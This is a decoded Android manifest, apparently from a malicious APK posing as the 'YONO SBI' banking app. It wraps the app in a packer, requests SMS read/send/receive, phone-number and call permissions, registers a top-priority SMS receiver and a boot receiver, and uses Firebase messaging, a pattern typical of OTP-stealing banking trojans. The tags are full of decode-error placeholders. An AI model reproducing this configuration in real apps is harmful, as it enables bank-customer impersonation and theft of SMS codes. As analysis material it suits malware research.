<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    android:versionCode="1"
    versionName="1.0"
    compileSdkVersion="35"
    compileSdkVersionCodename="15"
    package="com.example.admiogsgs"
    platformBuildVersionCode="35"
    platformBuildVersionName="15"
    android:tag="⟨STRING_DECODE_ERROR⟩">
    <uses-sdk
        minSdkVersion="24"
        targetSdkVersion="35"
        android:tag="⟨STRING_DECODE_ERROR⟩"/>
    <uses-feature
        name="android.hardware.telephony"
        required="false"
        android:tag="⟨STRING_DECODE_ERROR⟩"/>
    <uses-permission
        name="android.permission.RECEIVE_SMS"
        android:tag="⟨STRING_DECODE_ERROR⟩"/>
    <uses-permission
        name="android.permission.READ_SMS"
        android:tag="⟨STRING_DECODE_ERROR⟩"/>
    <uses-permission
        name="android.permission.SEND_SMS"
        android:tag="⟨STRING_DECODE_ERROR⟩"/>
    <uses-permission
        name="android.permission.READ_PHONE_STATE"
        android:tag="⟨STRING_DECODE_ERROR⟩"/>
    <uses-permission
        name="android.permission.READ_PHONE_NUMBERS"
        android:tag="⟨STRING_DECODE_ERROR⟩"/>
    <uses-permission
        name="android.permission.CALL_PHONE"
        android:tag="⟨STRING_DECODE_ERROR⟩"/>
    <uses-permission
        name="android.permission.INTERNET"
        android:tag="⟨STRING_DECODE_ERROR⟩"/>
    <uses-permission
        name="android.permission.ACCESS_NETWORK_STATE"
        android:tag="⟨STRING_DECODE_ERROR⟩"/>
    <uses-permission
        name="android.permission.WAKE_LOCK"
        android:tag="⟨STRING_DECODE_ERROR⟩"/>
    <uses-permission
        name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"
        android:tag="⟨STRING_DECODE_ERROR⟩"/>
    <uses-permission
        name="android.permission.RECEIVE_BOOT_COMPLETED"
        android:tag="⟨STRING_DECODE_ERROR⟩"/>
    <uses-permission
        name="android.permission.MANAGE_OWN_CALLS"
        android:tag="⟨STRING_DECODE_ERROR⟩"/>
    <queries android:tag="⟨STRING_DECODE_ERROR⟩">
        <package
            android:name="com.android.dialer"
            android:tag="⟨STRING_DECODE_ERROR⟩"/>
        <intent android:tag="⟨STRING_DECODE_ERROR⟩">
            <action
                android:name="android.intent.action.CALL"
                android:tag="⟨STRING_DECODE_ERROR⟩"/>
        </intent>
    </queries>
    <uses-permission
        name="android.permission.POST_NOTIFICATIONS"
        android:tag="⟨STRING_DECODE_ERROR⟩"/>
    <uses-permission
        name="com.example.admiogsgs_com.google.android.c2dm.permission.RECEIVE"
        android:tag="⟨STRING_DECODE_ERROR⟩"/>
    <uses-permission
        name="android.permission.FOREGROUND_SERVICE"
        android:tag="⟨STRING_DECODE_ERROR⟩"/>
    <gqzosr
        android:name="com.example.admiogsgs.DYNAMIC_RECEIVER_NOT_EXPORTED_PERMISSION"
        android:protectionLevel="signature"
        android:tag="⟨STRING_DECODE_ERROR⟩"/>
    <uses-permission
        name="com.example.admiogsgs.DYNAMIC_RECEIVER_NOT_EXPORTED_PERMISSION"
        android:tag="⟨STRING_DECODE_ERROR⟩"/>
    <application
        theme="@style/Theme.AppCompat.Light.NoActionBar"
        android:label="YONO SBI"
        android:icon="@mipmap/ic_launcher"
        name="cn.beingyi.sckit.shield1.SubApp"
        allowBackup="true"
        supportsRtl="true"
        android:usesCleartextTraffic="true"
        android:roundIcon="@mipmap/ic_launcher"
        appComponentFactory="androidx.core.app.CoreComponentFactory"
        android:tag="⟨STRING_DECODE_ERROR⟩">
        <activity
            name="com.example.admin.MainActivity"
            exported="true"
            android:tag="⟨STRING_DECODE_ERROR⟩">
            <intent-filter android:tag="⟨STRING_DECODE_ERROR⟩">
                <action
                    android:name="android.intent.action.MAIN"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
                <category
                    android:name="android.intent.category.LAUNCHER"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
            </intent-filter>
        </activity>
        <receiver
            android:name="com.example.admin.receivers.SMSReceiver"
            permission="android.permission.BROADCAST_SMS"
            enabled="true"
            exported="true"
            android:tag="⟨STRING_DECODE_ERROR⟩">
            <intent-filter
                android:priority="999"
                android:tag="⟨STRING_DECODE_ERROR⟩">
                <action
                    android:name="android.provider.Telephony.SMS_RECEIVED"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
            </intent-filter>
        </receiver>
        <service
            name="com.example.admin.services.MyFirebaseMessagingService"
            exported="true"
            android:tag="⟨STRING_DECODE_ERROR⟩">
            <intent-filter android:tag="⟨STRING_DECODE_ERROR⟩">
                <action
                    android:name="com.google.firebase.MESSAGING_EVENT"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
            </intent-filter>
        </service>
        <receiver
            android:name="com.example.admin.receivers.BootReceiver"
            enabled="true"
            exported="false"
            android:tag="⟨STRING_DECODE_ERROR⟩">
            <intent-filter android:tag="⟨STRING_DECODE_ERROR⟩">
                <action
                    android:name="android.intent.action.BOOT_COMPLETED"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
            </intent-filter>
        </receiver>
        <service
            name="com.google.android.datatransport.runtime.backends.TransportBackendDiscovery"
            exported="false"
            android:tag="⟨STRING_DECODE_ERROR⟩">
            <meta-data
                android:name="backend:com.google.android.datatransport.cct.CctBackendFactory"
                android:value="cct"
                android:tag="⟨STRING_DECODE_ERROR⟩"/>
        </service>
        <service
            name="com.google.android.datatransport.runtime.scheduling.jobscheduling.JobInfoSchedulerService"
            permission="android.permission.BIND_JOB_SERVICE"
            exported="false"
            android:tag="⟨STRING_DECODE_ERROR⟩"/>
        <receiver
            android:name="com.google.android.datatransport.runtime.scheduling.jobscheduling.AlarmManagerSchedulerBroadcastReceiver"
            exported="false"
            android:tag="⟨STRING_DECODE_ERROR⟩"/>
        <provider
            name="androidx.startup.InitializationProvider"
            exported="false"
            authorities="com.example.admiogsgs.androidx-startup"
            android:tag="⟨STRING_DECODE_ERROR⟩">
            <meta-data
                android:name="androidx.emoji2.text.EmojiCompatInitializer"
                android:value="androidx.startup"
                android:tag="⟨STRING_DECODE_ERROR⟩"/>
            <meta-data
                android:name="androidx.work.WorkManagerInitializer"
                android:value="androidx.startup"
                android:tag="⟨STRING_DECODE_ERROR⟩"/>
            <meta-data
                android:name="androidx.lifecycle.ProcessLifecycleInitializer"
                android:value="androidx.startup"
                android:tag="⟨STRING_DECODE_ERROR⟩"/>
            <meta-data
                android:name="androidx.profileinstaller.ProfileInstallerInitializer"
                android:value="androidx.startup"
                android:tag="⟨STRING_DECODE_ERROR⟩"/>
        </provider>
        <service
            name="com.google.firebase.components.ComponentDiscoveryService"
            exported="false"
            directBootAware="true"
            android:tag="⟨STRING_DECODE_ERROR⟩">
            <meta-data
                android:name="com.google.firebase.components:com.google.firebase.database.DatabaseRegistrar"
                android:value="com.google.firebase.components.ComponentRegistrar"
                android:tag="⟨STRING_DECODE_ERROR⟩"/>
            <meta-data
                android:name="com.google.firebase.components:com.google.firebase.messaging.FirebaseMessagingKtxRegistrar"
                android:value="com.google.firebase.components.ComponentRegistrar"
                android:tag="⟨STRING_DECODE_ERROR⟩"/>
            <meta-data
                android:name="com.google.firebase.components:com.google.firebase.messaging.FirebaseMessagingRegistrar"
                android:value="com.google.firebase.components.ComponentRegistrar"
                android:tag="⟨STRING_DECODE_ERROR⟩"/>
            <meta-data
                android:name="com.google.firebase.components:com.google.firebase.installations.FirebaseInstallationsKtxRegistrar"
                android:value="com.google.firebase.components.ComponentRegistrar"
                android:tag="⟨STRING_DECODE_ERROR⟩"/>
            <meta-data
                android:name="com.google.firebase.components:com.google.firebase.installations.FirebaseInstallationsRegistrar"
                android:value="com.google.firebase.components.ComponentRegistrar"
                android:tag="⟨STRING_DECODE_ERROR⟩"/>
            <meta-data
                android:name="com.google.firebase.components:com.google.firebase.FirebaseCommonKtxRegistrar"
                android:value="com.google.firebase.components.ComponentRegistrar"
                android:tag="⟨STRING_DECODE_ERROR⟩"/>
            <meta-data
                android:name="com.google.firebase.components:com.google.firebase.datatransport.TransportRegistrar"
                android:value="com.google.firebase.components.ComponentRegistrar"
                android:tag="⟨STRING_DECODE_ERROR⟩"/>
        </service>
        <receiver
            android:name="com.google.firebase.iid.FirebaseInstanceIdReceiver"
            permission="com.google.android.c2dm.permission.SEND"
            exported="true"
            android:tag="⟨STRING_DECODE_ERROR⟩">
            <intent-filter android:tag="⟨STRING_DECODE_ERROR⟩">
                <action
                    android:name="com.google.android.c2dm.intent.RECEIVE"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
            </intent-filter>
            <meta-data
                android:name="com.google.android.gms.cloudmessaging.FINISHED_AFTER_HANDLED"
                android:value="true"
                android:tag="⟨STRING_DECODE_ERROR⟩"/>
        </receiver>
        <service
            name="com.google.firebase.messaging.FirebaseMessagingService"
            exported="false"
            directBootAware="true"
            android:tag="⟨STRING_DECODE_ERROR⟩">
            <intent-filter
                android:priority="-500"
                android:tag="⟨STRING_DECODE_ERROR⟩">
                <action
                    android:name="com.google.firebase.MESSAGING_EVENT"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
            </intent-filter>
        </service>
        <activity
            theme="@android:style/Theme.Translucent.NoTitleBar"
            name="com.google.android.gms.common.api.GoogleApiActivity"
            exported="false"
            android:tag="⟨STRING_DECODE_ERROR⟩"/>
        <provider
            name="com.google.firebase.provider.FirebaseInitProvider"
            exported="false"
            authorities="com.example.admiogsgs.firebaseinitprovider"
            initOrder="100"
            directBootAware="true"
            android:tag="⟨STRING_DECODE_ERROR⟩"/>
        <service
            name="androidx.room.MultiInstanceInvalidationService"
            exported="false"
            directBootAware="true"
            android:tag="⟨STRING_DECODE_ERROR⟩"/>
        <service
            name="androidx.work.impl.background.systemalarm.SystemAlarmService"
            enabled="@bool/enable_system_alarm_service_default"
            exported="false"
            directBootAware="false"
            android:tag="⟨STRING_DECODE_ERROR⟩"/>
        <service
            name="androidx.work.impl.background.systemjob.SystemJobService"
            permission="android.permission.BIND_JOB_SERVICE"
            enabled="@bool/enable_system_job_service_default"
            exported="true"
            directBootAware="false"
            android:tag="⟨STRING_DECODE_ERROR⟩"/>
        <service
            name="androidx.work.impl.foreground.SystemForegroundService"
            enabled="@bool/enable_system_foreground_service_default"
            exported="false"
            directBootAware="false"
            android:tag="⟨STRING_DECODE_ERROR⟩"/>
        <receiver
            android:name="androidx.work.impl.utils.ForceStopRunnable$BroadcastReceiver"
            enabled="true"
            exported="false"
            directBootAware="false"
            android:tag="⟨STRING_DECODE_ERROR⟩"/>
        <receiver
            android:name="androidx.work.impl.background.systemalarm.ConstraintProxy$BatteryChargingProxy"
            enabled="false"
            exported="false"
            directBootAware="false"
            android:tag="⟨STRING_DECODE_ERROR⟩">
            <intent-filter android:tag="⟨STRING_DECODE_ERROR⟩">
                <action
                    android:name="android.intent.action.ACTION_POWER_CONNECTED"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
                <action
                    android:name="android.intent.action.ACTION_POWER_DISCONNECTED"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
            </intent-filter>
        </receiver>
        <receiver
            android:name="androidx.work.impl.background.systemalarm.ConstraintProxy$BatteryNotLowProxy"
            enabled="false"
            exported="false"
            directBootAware="false"
            android:tag="⟨STRING_DECODE_ERROR⟩">
            <intent-filter android:tag="⟨STRING_DECODE_ERROR⟩">
                <action
                    android:name="android.intent.action.BATTERY_OKAY"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
                <action
                    android:name="android.intent.action.BATTERY_LOW"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
            </intent-filter>
        </receiver>
        <receiver
            android:name="androidx.work.impl.background.systemalarm.ConstraintProxy$StorageNotLowProxy"
            enabled="false"
            exported="false"
            directBootAware="false"
            android:tag="⟨STRING_DECODE_ERROR⟩">
            <intent-filter android:tag="⟨STRING_DECODE_ERROR⟩">
                <action
                    android:name="android.intent.action.DEVICE_STORAGE_LOW"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
                <action
                    android:name="android.intent.action.DEVICE_STORAGE_OK"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
            </intent-filter>
        </receiver>
        <receiver
            android:name="androidx.work.impl.background.systemalarm.ConstraintProxy$NetworkStateProxy"
            enabled="false"
            exported="false"
            directBootAware="false"
            android:tag="⟨STRING_DECODE_ERROR⟩">
            <intent-filter android:tag="⟨STRING_DECODE_ERROR⟩">
                <action
                    android:name="android.net.conn.CONNECTIVITY_CHANGE"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
            </intent-filter>
        </receiver>
        <receiver
            android:name="androidx.work.impl.background.systemalarm.RescheduleReceiver"
            enabled="false"
            exported="false"
            directBootAware="false"
            android:tag="⟨STRING_DECODE_ERROR⟩">
            <intent-filter android:tag="⟨STRING_DECODE_ERROR⟩">
                <action
                    android:name="android.intent.action.BOOT_COMPLETED"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
                <action
                    android:name="android.intent.action.TIME_SET"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
                <action
                    android:name="android.intent.action.TIMEZONE_CHANGED"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
            </intent-filter>
        </receiver>
        <receiver
            android:name="androidx.work.impl.background.systemalarm.ConstraintProxyUpdateReceiver"
            enabled="@bool/enable_system_alarm_service_default"
            exported="false"
            directBootAware="false"
            android:tag="⟨STRING_DECODE_ERROR⟩">
            <intent-filter android:tag="⟨STRING_DECODE_ERROR⟩">
                <action
                    android:name="androidx.work.impl.background.systemalarm.UpdateProxies"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
            </intent-filter>
        </receiver>
        <receiver
            android:name="androidx.work.impl.diagnostics.DiagnosticsReceiver"
            permission="android.permission.DUMP"
            enabled="true"
            exported="true"
            directBootAware="false"
            android:tag="⟨STRING_DECODE_ERROR⟩">
            <intent-filter android:tag="⟨STRING_DECODE_ERROR⟩">
                <action
                    android:name="androidx.work.diagnostics.REQUEST_DIAGNOSTICS"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
            </intent-filter>
        </receiver>
        <meta-data
            android:name="com.google.android.gms.version"
            android:value="@integer/google_play_services_version"
            android:tag="⟨STRING_DECODE_ERROR⟩"/>
        <receiver
            android:name="androidx.profileinstaller.ProfileInstallReceiver"
            permission="android.permission.DUMP"
            enabled="true"
            exported="true"
            directBootAware="false"
            android:tag="⟨STRING_DECODE_ERROR⟩">
            <intent-filter android:tag="⟨STRING_DECODE_ERROR⟩">
                <action
                    android:name="androidx.profileinstaller.action.INSTALL_PROFILE"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
            </intent-filter>
            <intent-filter android:tag="⟨STRING_DECODE_ERROR⟩">
                <action
                    android:name="androidx.profileinstaller.action.SKIP_FILE"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
            </intent-filter>
            <intent-filter android:tag="⟨STRING_DECODE_ERROR⟩">
                <action
                    android:name="androidx.profileinstaller.action.SAVE_PROFILE"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
            </intent-filter>
            <intent-filter android:tag="⟨STRING_DECODE_ERROR⟩">
                <action
                    android:name="androidx.profileinstaller.action.BENCHMARK_OPERATION"
                    android:tag="⟨STRING_DECODE_ERROR⟩"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>
